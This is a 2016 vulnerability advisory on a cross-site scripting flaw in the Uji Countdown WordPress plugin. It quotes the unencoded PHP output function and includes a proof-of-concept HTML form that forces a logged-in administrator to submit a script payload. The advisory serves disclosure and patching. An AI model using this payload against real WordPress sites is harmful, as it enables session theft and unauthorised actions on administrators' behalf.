------------------------------------------------------------------------ Cross-Site Scripting in Uji Countdown WordPress Plugin ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0029 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on Uji Countdown WordPress Plugin version 2.0.6. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in Uji Countdown version 2.0.7. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_uji_countdown_wordpress_plugin.html The issue exists in the file /classes/class-uji-countdown-admin.php and is caused by the lack of output encoding in the ujic_tabs_values() function. private function ujic_tabs_values() { global $wpdb; $ujictab = ''; $table_name = $wpdb->prefix . "uji_counter"; $ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" ); if ( !empty( $ujic_datas ) ) { foreach ( $ujic_datas as $ujic ) { $ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic'; $ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>'; $ujictab .='<tr> <td>' . $ujic->time . '</td> <td>' . $ujic->title . '</td> <td>' . $ujic_ico . '</td> <td> <a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a> </td> </tr>'; } } return $ujictab; } In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website. Proof of concept <html> <body> <form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST"> <input type="hidden" name="ujic&#95;style" value="classic" /> <input type="hidden" name="ujic&#95;name" value="&quot;><script>alert(1);</script>" /> <input type="hidden" name="ujic&#95;goof" value="ABeeZee" /> <input type="hidden" name="ujic&#95;pos" value="center" /> <input type="hidden" name="ujic&#95;d" value="true" /> <input type="hidden" name="ujic&#95;h" value="true" /> <input type="hidden" name="ujic&#95;m" value="true" /> <input type="hidden" name="ujic&#95;s" value="true" /> <input type="hidden" name="ujic&#95;txt" value="true" /> <input type="hidden" name="ujic&#95;size" value="32" /> <input type="hidden" name="ujic&#95;col&#95;dw" value="&#35;a61ba6" /> <input type="hidden" name="ujic&#95;col&#95;up" value="&#35;c368c3" /> <input type="hidden" name="ujic&#95;col&#95;txt" value="&#35;ffffff" /> <input type="hidden" name="ujic&#95;col&#95;sw" value="&#35;000000" /> <input type="hidden" name="ujic&#95;col&#95;lab" value="&#35;000000" /> <input type="hidden" name="ujic&#95;lab&#95;sz" value="13" /> <input type="hidden" name="ujic&#95;subscrFrmWidth" value="100" /> <input type="hidden" name="ujic&#95;subscrFrmAboveText" value="Join&#32;Our&#32;Newsletter" /> <input type="hidden" name="ujic&#95;subscrFrmInputText" value="Enter&#32;your&#32;email&#32;here" /> <input type="hidden" name="ujic&#95;subscrFrmSubmitText" value="Subscribe" /> <input type="hidden" name="ujic&#95;subscrFrmSubmitColor" value="&#35;ab02b2" /> <input type="hidden" name="ujic&#95;subscrFrmThanksMessage" value="Thanks&#32;for&#32;subscribing" /> <input type="hidden" name="ujic&#95;subscrFrmErrorMessage" value="Invalid&#32;email&#32;address" /> <input type="hidden" name="submit&#95;ujic" value="Save&#32;Style" /> <input type="submit" value="Submit request" /> </form> </body> </html> ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.